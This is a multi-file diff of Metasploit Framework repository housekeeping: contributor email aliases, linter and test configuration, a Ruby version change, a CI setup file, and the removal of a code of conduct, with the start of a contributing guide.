-pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
-sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
-smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
-space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>               <todb@metasploit.com>
-todb-r7 <todb-r7@github>               <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
-wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
+bturner-r7 <bturner-r7@github>     Brandon Turner <brandon_turner@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>   David Maloney <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
+ecarey-r7 <ecarey-r7@github>       Erran Carey <e@ipwnstuff.com>
+farias-r7 <farias-r7@github>       Fernando Arias <fernando_arias@rapid7.com>
+hmoore-r7 <hmoore-r7@github>       HD Moore <hd_moore@rapid7.com>
+hmoore-r7 <hmoore-r7@github>       HD Moore <hdm@digitaloffense.net>
+jlee-r7 <jlee-r7@github>           egypt <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
+joev-r7 <joev-r7@github>           joev <joev@metasploit.com>
+joev-r7 <joev-r7@github>           Joe Vennix <Joe_Vennix@rapid7.com>
+jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan.vazquez@metasploit.com>
+jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan_vazquez@rapid7.com>
+limhoff-r7 <limhoff-r7@github>     Luke Imhoff <luke_imhoff@rapid7.com>
+shuckins-r7 <shuckins-r7@github>   Samuel Huckins <samuel_huckins@rapid7.com>
+todb-r7 <todb-r7@github>           Tod Beardsley <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>           Tod Beardsley <todb@metasploit.com>
+todb-r7 <todb-r7@github>           Tod Beardsley <todb@packetfu.com>
+trosen-r7 <trosen-r7@github>       Trevor Rosen <Trevor_Rosen@rapid7.com>
+wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
+wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@metasploit.com>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -48,141 +32,61 @@ wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

-asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
-bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
-bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
-brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
-brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
-brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
-brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
-bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry.volatile@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry@bperry-rapid7.(none)>
+Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
+Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
+Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
-Chao-mu <Chao-Mu@github>               <chao.mu@minorcrash.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
-claudijd <claudijd@github>             Jonathan Claudius <claudijd@yahoo.com>
-claudijd <claudijd@github>             Jonathan Claudius <jclaudius@trustwave.com>
 corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
 corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
-crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
-DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
-dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                   <james_lee@rapid7.com>
-espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
-farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
-FireFart <FireFart@github>             <firefart@gmail.com>
-FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
-gmikeska-r7 <gmikeska-r7@github>       <greg_mikeska@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <=>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <YOUR_USERNAME_FOR_EMAIL>
-g0tmi1k <g0tmi1k@github>               <g0tmi1k@users.noreply.github.com>
-g0tmi1k <g0tmi1k@github>               <have.you.g0tmi1k@gmail.com>
-h00die <h00die@github>                 <h00die@users.noreply.github.com>
-h00die <h00die@github>                 <mike@shorebreaksecurity.com>
+FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
-hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
-hdm <hdm@github>                       HD Moore <x@hdm.io>
-jabra <jabra@github>                   <jabra@spl0it.org>
-jcran <jcran@github>                   <jcran@0x0e.org>
-jcran <jcran@github>                   <jcran@pentestify.com>
-jcran <jcran@github>                   <jcran@pwnieexpress.com>
-jcran <jcran@github>                   <jcran@rapid7.com>
-jduck <jduck@github>                   <github.jdrake@qoop.org>
-jduck <jduck@github>                   <jdrake@qoop.org>
+jcran <jcran@github>                   Jonathan Cran <jcran@0x0e.org>
+jcran <jcran@github>                   Jonathan Cran <jcran@rapid7.com>
+jduck <jduck@github>                   Joshua Drake <github.jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
-jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
-joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
-joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
-joevennix <joevennix@github>           <joev@metasploit.com>
-joevennix <joevennix@github>           jvennix-r7 <Joe_Vennix@rapid7.com>
-juanvazquez <juanvazquez@github>       jvazquez-r7 <juan.vazquez@metasploit.com>
-juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@kernelsmith.com>
-kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@metasploit.com>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
-kgray-r7 <kgray-r7@github>             <kyle_gray@rapid7.com>
 kost <kost@github>                     Vlatko Kosturjak <kost@linux.hr>
 kris <kris@???>                        kris <>
-KronicDeth <KronicDeth@github>         Luke Imhoff <luke_imhoff@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
-m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
-Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
+Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
-net-ninja <net-ninja@github.com>       Steven Seeley <steventhomasseeley@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
-nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
+nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk> 
 nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
-nullbind <nullbind@github>             Scott Sutherland <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
-oj <oj@github>                         <oj@buffered.io>
+OJ <oj@github>                         OJ Reeves <oj@buffered.io>
+OJ <oj@github>                         OJ <oj@buffered.io>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
-r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
-rep <mschloesser-r7@github>            Mark Schloesser <mark_schloesser@rapid7.com>
-rep <mschloesser-r7@github>            mschloesser-r7 <mark_schloesser@rapid7.com>
-RageLtMan <sempervictus@github>        <rageltman [at] sempervictus>
-RageLtMan <sempervictus@github>        <rageltman@sempervictus.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
-rwhitcroft <rwhitcroft@github>         <rwhitcroft.github@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
-scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
-sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
-smashery <smashery@github>             Ashley Donaldson <smashery@gmail.com>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
-stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
-stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
-tatanus <tatanus@github>               <adam_compton@rapid7.com>
-techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
-techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
-timwr <timwr@github>                   <timrlw@gmail.com>
-TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
-trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
-trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
-void-in <void-in@github>               void_in <root@localhost.localdomain>
-void-in <void-in@github>               void-in <root@localhost.localdomain>
-void-in <void-in@github>               <void-in@users.noreply.github.com>
-void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
-void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
-zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

 # Aliases for utility author names. Since they're fake, typos abound

-Metasploit Bot <metasploit@rapid7.com>    Metasploit <metasploit@rapid7.com>
-Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
-Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
@@ -1,3 +1,2 @@
 --color
 --format Fivemat
--require spec_helper
@@ -1,437 +0,0 @@
-# This list was intially created by analyzing the last three months (51
-# modules) committed to Metasploit Framework. Many, many older modules
-# will have offenses, but this should at least provide a baseline for
-# new modules.
-#
-# Updates to this file should include a 'Description' parameter for any
-# explanation needed.
-
-# inherit_from: .rubocop_todo.yml
-
-AllCops:
-  TargetRubyVersion: 2.6
-  SuggestExtensions: false
-  NewCops: disable
-
-require:
-  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
-  - ./lib/rubocop/cop/layout/module_hash_values_on_same_line.rb
-  - ./lib/rubocop/cop/layout/module_description_indentation.rb
-  - ./lib/rubocop/cop/layout/extra_spacing_with_bindata_ignored.rb
-  - ./lib/rubocop/cop/lint/module_disclosure_date_format.rb
-  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
-  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
-  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
-
-Layout/SpaceBeforeBrackets:
-  Description: >-
-    Disabled as it generates invalid code:
-      https://github.com/rubocop-hq/rubocop/issues/9499
-  Enabled: false
-
-Lint/AmbiguousAssignment:
-  Enabled: true
-
-Lint/DeprecatedConstants:
-  Enabled: true
-
-Lint/DuplicateBranch:
-  Description: >-
-    Disabled as it causes a lot of noise around our current exception/error handling
-  Enabled: false
-
-Lint/DuplicateRegexpCharacterClassElement:
-  Enabled: false
-
-Lint/EmptyBlock:
-  Enabled: false
-
-Lint/EmptyClass:
-  Enabled: false
-
-Lint/LambdaWithoutLiteralBlock:
-  Enabled: true
-
-Lint/NoReturnInBeginEndBlocks:
-  Enabled: true
-
-Lint/NumberedParameterAssignment:
-  Enabled: true
-
-Lint/OrAssignmentToConstant:
-  Enabled: true
-
-Lint/RedundantDirGlobSort:
-  Enabled: true
-
-Lint/SymbolConversion:
-  Enabled: true
-
-Lint/ToEnumArguments:
-  Enabled: true
-
-Lint/TripleQuotes:
-  Enabled: true
-
-Lint/UnexpectedBlockArity:
-  Enabled: true
-
-Lint/UnmodifiedReduceAccumulator:
-  Enabled: true
-
-Style/ArgumentsForwarding:
-  Enabled: true
-
-Style/BlockComments:
-  Description: >-
-    Disabled as multiline comments are great for embedded code snippets/payloads that can
-    be copy/pasted directly into a terminal etc.
-  Enabled: false
-
-Style/CaseLikeIf:
-  Description: >-
-    This would cause a lot of noise, and potentially introduce subtly different code when
-    being auto fixed. Could potentially be enabled in isolation, but would require more
-    consideration.
-  Enabled: false
-
-Style/CollectionCompact:
-  Enabled: true
-
-Style/DocumentDynamicEvalDefinition:
-  Enabled: false
-
-Style/EndlessMethod:
-  Enabled: true
-
-Style/HashExcept:
-  Enabled: true
-
-Style/IfWithBooleanLiteralBranches:
-  Description: >-
-    Most of the time this is a valid replacement. Although it can generate subtly different
-    rewrites that might break code:
-      2.7.2 :001 > foo = nil
-      => nil
-      2.7.2 :002 > (foo && foo['key'] == 'foo') ? true : false
-      => false
-      2.7.2 :003 > foo && foo['key'] == 'foo'
-      => nil
-  Enabled: false
-
-Style/NegatedIfElseCondition:
-  Enabled: false
-
-Style/MultipleComparison:
-  Description: >-
-    Disabled as it generates invalid code:
-      https://github.com/rubocop-hq/rubocop/issues/9520
-    It may also introduce subtle semantic issues if automatically applied to the
-    entire codebase without rigorous testing.
-  Enabled: false
-
-Style/NilLambda:
-  Enabled: true
-
-Style/RedundantArgument:
-  Enabled: false
-
-Style/RedundantAssignment:
-  Description: >-
-    Disabled as it sometimes improves the readability of code having an explicitly named
-    response object, it also makes it easier to put a breakpoint between the assignment
-    and return expression
-  Enabled: false
-
-Style/SwapValues:
-  Enabled: false
-
-Layout/ModuleHashOnNewLine:
-  Enabled: true
-
-Layout/ModuleHashValuesOnSameLine:
-  Enabled: true
-
-Layout/ModuleDescriptionIndentation:
-  Enabled: true
-
-Lint/ModuleDisclosureDateFormat:
-  Enabled: true
-
-Lint/ModuleDisclosureDatePresent:
-  Include:
-    # Only exploits require disclosure dates, but they can be present in auxiliary modules etc.
-    - 'modules/exploits/**/*'
-
-Lint/ModuleEnforceNotes:
-  Include:
-    # Only exploits and auxiliary modules require SideEffects to be listed.
-    - 'modules/exploits/**/*'
-    - 'modules/auxiliary/**/*'
-    - 'modules/post/**/*'
-
-Lint/DeprecatedGemVersion:
-  Enabled: true
-  Exclude:
-    - 'metasploit-framework.gemspec'
-
-Metrics/ClassLength:
-  Description: 'Most Metasploit modules are quite large. This is ok.'
-  Enabled: true
-  Exclude:
-    - 'modules/**/*'
-    - 'test/modules/**/*'
-
-Style/ClassAndModuleChildren:
-  Enabled: false
-  Description: 'Forced nesting is harmful for grepping and general code comprehension'
-
-Metrics/AbcSize:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Metrics/CyclomaticComplexity:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Metrics/PerceivedComplexity:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Metrics/BlockNesting:
-  Description: >-
-    This is a good rule to follow, but will cause a lot of overhead introducing this rule.
-  Enabled: false
-
-Metrics/ParameterLists:
-  Description: >-
-    This is a good rule to follow, but will cause a lot of overhead introducing this rule.
-    Increasing the max count for now
-  Max: 8
-
-Style/TernaryParentheses:
-  Enabled: false
-  Description: 'This outright produces bugs'
-
-Style/FrozenStringLiteralComment:
-  Enabled: false
-  Description: 'We cannot support this yet without a lot of things breaking'
-
-Style/RedundantReturn:
-  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
-  Enabled: false
-
-Naming/HeredocDelimiterNaming:
-  Description: >-
-    Could be enabled in isolation with additional effort.
-  Enabled: false
-
-Naming/AccessorMethodName:
-  Description: >-
-    Disabled for now, as this naming convention is used in a lot of core library files.
-    Could be enabled in isolation with additional effort.
-  Enabled: false
-
-Naming/ConstantName:
-  Description: >-
-    Disabled for now, Metasploit is unfortunately too inconsistent with its naming to introduce
-    this. Definitely possible to enforce this in the future if need be.
-
-    Examples:
-        ManualRanking, LowRanking, etc.
-        NERR_ClientNameNotFound
-        HttpFingerprint
-        CachedSize
-        ErrUnknownTransferId
-  Enabled: false
-
-Naming/VariableNumber:
-  Description: 'To make it easier to use reference code, disable this cop'
-  Enabled: false
-
-Style/NumericPredicate:
-  Description: 'This adds no efficiency nor space saving'
-  Enabled: false
-
-Style/Documentation:
-  Enabled: true
-  Description: 'Most Metasploit modules do not have class documentation.'
-  Exclude:
-    - 'modules/**/*'
-    - 'test/modules/**/*'
-    - 'spec/file_fixtures/modules/**/*'
-
-Layout/FirstArgumentIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/ArgumentAlignment:
-  Enabled: true
-  EnforcedStyle: with_first_argument
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/FirstHashElementIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/FirstHashElementLineBreak:
-  Enabled: true
-  Description: 'Enforce consistency by breaking hash elements on to new lines'
-
-Layout/SpaceInsideArrayLiteralBrackets:
-  Enabled: false
-  Description: 'Almost all module metadata have space in brackets'
-
-Style/GuardClause:
-  Enabled: false
-  Description: 'This often introduces bugs in tested code'
-
-Style/EmptyLiteral:
-  Enabled: false
-  Description: 'This looks awkward when you mix empty and non-empty literals'
-
-Style/NegatedIf:
-  Enabled: false
-  Description: 'This often introduces bugs in tested code'
-
-Style/ConditionalAssignment:
-  Enabled: false
-  Description: 'This is confusing for folks coming from other languages'
-
-Style/Encoding:
-  Description: 'We prefer binary to UTF-8.'
-  Enabled: false
-
-Style/ParenthesesAroundCondition:
-  Enabled: false
-  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
-
-Style/StringConcatenation:
-  Enabled: false
-  Description: >-
-    Disabled for now as it changes escape sequences when auto corrected:
-      https://github.com/rubocop/rubocop/issues/9543
-
-    Additionally seems to break with multiline string concatenation with trailing comments, example:
-      payload = "\x12" + # Size
-                "\x34" + # eip
-                "\x56"   # etc
-    With `rubocop -A` this will become:
-      payload = "\u00124V"    # etc
-
-Style/TrailingCommaInArrayLiteral:
-  Enabled: false
-  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'
-
-Layout/LineLength:
-  Description: >-
-    Metasploit modules often pattern match against very
-    long strings when identifying targets.
-  Enabled: false
-
-Metrics/BlockLength:
-  Enabled: true
-  Description: >-
-    While the style guide suggests 10 lines, exploit definitions
-    often exceed 200 lines.
-  Max: 300
-
-Metrics/MethodLength:
-  Enabled: true
-  Description: >-
-    While the style guide suggests 10 lines, exploit definitions
-    often exceed 200 lines.
-  Max: 300
-
-Naming/MethodParameterName:
-  Enabled: true
-  Description: 'Whoever made this requirement never looked at crypto methods, IV'
-  MinNameLength: 2
-
-# %q() is super useful for long strings split over multiple lines and
-# is very common in module constructors for things like descriptions
-Style/RedundantPercentQ:
-  Enabled: false
-
-Style/NumericLiterals:
-  Enabled: false
-  Description: 'This often hurts readability for exploit-ish code.'
-
-Layout/FirstArrayElementLineBreak:
-  Enabled: true
-  Description: 'This cop checks for a line break before the first element in a multi-line array.'
-
-Layout/FirstArrayElementIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful to force values within the register_options array to have sane indentation'
-
-Layout/EmptyLinesAroundClassBody:
-  Enabled: false
-  Description: 'these are used to increase readability'
-
-Layout/EmptyLinesAroundMethodBody:
-  Enabled: true
-
-Layout/ExtraSpacingWithBinDataIgnored:
-  Description: 'Do not use unnecessary spacing.'
-  Enabled: true
-  # When true, allows most uses of extra spacing if the intent is to align
-  # things with the previous or next line, not counting empty lines or comment
-  # lines.
-  AllowForAlignment: false
-  # When true, allows things like 'obj.meth(arg)  # comment',
-  # rather than insisting on 'obj.meth(arg) # comment'.
-  # If done for alignment, either this OR AllowForAlignment will allow it.
-  AllowBeforeTrailingComments: true
-  # When true, forces the alignment of `=` in assignments on consecutive lines.
-  ForceEqualSignAlignment: false
-
-Style/For:
-  Enabled: false
-  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
-
-Style/WordArray:
-  Enabled: false
-  Description: 'Metasploit prefers consistent use of []'
-
-Style/IfUnlessModifier:
-  Enabled: false
-  Description: 'This style might save a couple of lines, but often makes code less clear'
-
-Style/PercentLiteralDelimiters:
-  Description: 'Use `%`-literal delimiters consistently.'
-  Enabled: true
-  # Specify the default preferred delimiter for all types with the 'default' key
-  # Override individual delimiters (even with default specified) by specifying
-  # an individual key
-  PreferredDelimiters:
-    default: ()
-    '%i': '[]'
-    '%I': '[]'
-    '%r': '{}'
-    '%w': '[]'
-    '%W': '[]'
-    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
-  VersionChanged: '0.48.1'
-
-Style/RedundantBegin:
-  Enabled: true
-
-Style/SafeNavigation:
-  Description: >-
-    This cop transforms usages of a method call safeguarded by
-    a check for the existence of the object to
-    safe navigation (`&.`).
-
-    This has been disabled as in some scenarios it produced invalid code, and disobeyed the 'AllowedMethods'
-    configuration.
-  Enabled: false
-
-Style/UnpackFirst:
-  Description: >-
-    Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
-    into a debugging REPL.
-  Enabled: false
@@ -1 +1 @@
-3.0.2
+1.9.3-p484
@@ -39,6 +39,7 @@ SimpleCov.configure do
 	# Other library groups
 	#

+	add_group 'Fastlib', 'lib/fastlib'
 	add_group 'Metasm', 'lib/metasm'
 	add_group 'PacketFu', 'lib/packetfu'
 	add_group 'Rex', 'lib/rex'
@@ -0,0 +1,23 @@
+language: ruby
+before_install:
+  - rake --version
+  - sudo apt-get update -qq
+  - sudo apt-get install -qq libpcap-dev
+  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
+  - ls -la ./.git/hooks
+  - ./.git/hooks/post-merge
+before_script:
+  - cp config/database.yml.travis config/database.yml
+  - bundle exec rake --version
+  - bundle exec rake db:create
+  - bundle exec rake db:migrate
+
+rvm:
+  #- '1.8.7'
+  - '1.9.3'
+
+notifications:
+  irc: "irc.freenode.org#msfnotify"
+
+git:
+  depth: 5
@@ -2,9 +2,6 @@
 --exclude samples/
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
--files CONTRIBUTING.md,COPYING,LICENSE
-app/**/*.rb
+--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
 lib/msf/**/*.rb
-lib/metasploit/**/*.rb
 lib/rex/**/*.rb
-plugins/**/*.rb
@@ -1,52 +0,0 @@
-# Contributor Code of Conduct
-
-As contributors and maintainers of this project, and in the interest of
-fostering an open and welcoming community, we pledge to respect all people who
-contribute through reporting issues, posting feature requests, updating
-documentation, submitting pull requests or patches, and other activities.
-
-We are committed to making participation in this project a harassment-free
-experience for everyone, regardless of level of experience, gender, gender
-identity and expression, sexual orientation, disability, personal appearance,
-body size, race, ethnicity, age, religion, or nationality.
-
-Examples of unacceptable behavior by participants include:
-
-* The use of sexualized language or imagery
-* Personal attacks
-* Trolling or insulting/derogatory comments
-* Public or private harassment
-* Publishing other's private information, such as physical or electronic
-  addresses, without explicit permission
-* Other unethical or unprofessional conduct
-
-Project maintainers have the right and responsibility to remove, edit, or
-reject comments, commits, code, wiki edits, issues, and other contributions
-that are not aligned to this Code of Conduct, or to ban temporarily or
-permanently any contributor for other behaviors that they deem inappropriate,
-threatening, offensive, or harmful.
-
-By adopting this Code of Conduct, project maintainers commit themselves to
-fairly and consistently applying these principles to every aspect of managing
-this project. Project maintainers who do not follow or enforce the Code of
-Conduct may be permanently removed from the project team.
-
-This Code of Conduct applies both within project spaces and in public spaces
-when an individual is representing the project or its community.
-
-Instances of abusive, harassing, or otherwise unacceptable behavior may be
-reported by contacting the project maintainers at msfdev@metasploit.com. If
-the incident involves a committer, you may report directly to
-caitlin_condon@rapid7.com or todb@metasploit.com.
-
-All complaints will be reviewed and investigated and will result in a
-response that is deemed necessary and appropriate to the circumstances.
-Maintainers are obligated to maintain confidentiality with regard to the
-reporter of an incident.
-
-This Code of Conduct is adapted from the [Contributor Covenant][homepage],
-version 1.3.0, available at
-[http://contributor-covenant.org/version/1/3/0/][version]
-
-[homepage]: http://contributor-covenant.org
-[version]: http://contributor-covenant.org/version/1/3/0/
@@ -1,111 +1,70 @@
 # Contributing to Metasploit
-Thank you for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.

-## Code Free Contributions
-Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+Thanks for your interest in making Metasploit -- and therefore, the
